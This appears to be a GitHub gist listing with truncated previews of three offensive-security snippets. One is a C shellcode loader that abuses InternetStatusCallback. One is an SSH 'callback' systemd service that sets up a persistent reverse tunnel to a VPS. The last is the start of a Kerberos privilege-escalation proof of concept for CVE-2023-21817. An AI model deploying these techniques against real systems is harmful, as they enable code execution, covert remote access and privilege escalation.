ustayready ustayready
whokilleddb
/ JasonToddIsTheBestRobin.c
Created
August 21, 2025 22:51
Unnecessarily complicated way of controlling shellcode execution using InternetStatusCallback()
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <windows.h> | |
| #include <wininet.h> | |
| #include <stdio.h> | |
| #pragma comment(lib, "wininet.lib") | |
| // notepad.exe shellcode | |
| char shellcode[] = { | |
| 0xfc, 0x48, 0x83, 0xe4, 0xf0, 0xe8, 0xc0, 0x00, 0x00, 0x00, 0x41, 0x51, 0x41, 0x50, 0x52, 0x51, | |
| 0x56, 0x48, 0x31, 0xd2, 0x65, 0x48, 0x8b, 0x52, 0x60, 0x48, 0x8b, 0x52, 0x18, 0x48, 0x8b, 0x52, |
chriselgee
/ gist:761e66afc6449baf23d258199efe9ceb
Last active
July 13, 2023 17:22
SSH Callback Service
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # SSH Callback Service | |
| # Replace HOSTNAME with the VPS you're connecting to | |
| # Replace USERNAME with your user on the VPS | |
| # Replace LOCALUSER (or the whole path) to point to the private key for USERNAME on HOSTNAME | |
| # Usage: | |
| # - Try the SSH manually first, as the root user, so the VPS can be added to the known_hosts file | |
| # - `systemctl enable callback.service`, `systemctl start callback.service` | |
| # - SSH to the VPS from your system, and `ssh USER@127.0.0.1 -p22000 -i KEYNAME`, where USER is a user on the distant system and KEYNAME is an accepted key for that user | |
| # Troubleshooting: | |
| # - Ensure "GatewayPorts" is set to "Yes" in /etc/ssh/sshd_config on the VPS |
rvrsh3ll
/ urbandoor.cs
Created
April 11, 2023 00:16
— forked from monoxgas/urbandoor.cs
Minimal PoC code for Kerberos Unlock LPE (CVE-2023-21817)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using NtApiDotNet; | |
| using NtApiDotNet.Ndr.Marshal; | |
| using NtApiDotNet.Win32; | |
| using NtApiDotNet.Win32.Rpc.Transport; | |
| using NtApiDotNet.Win32.Security.Authentication; | |
| using NtApiDotNet.Win32.Security.Authentication.Kerberos; | |
| using NtApiDotNet.Win32.Security.Authentication.Kerberos.Client; | |
| using NtApiDotNet.Win32.Security.Authentication.Kerberos.Server; | |
| using NtApiDotNet.Win32.Security.Authentication.Logon; | |
| using System; |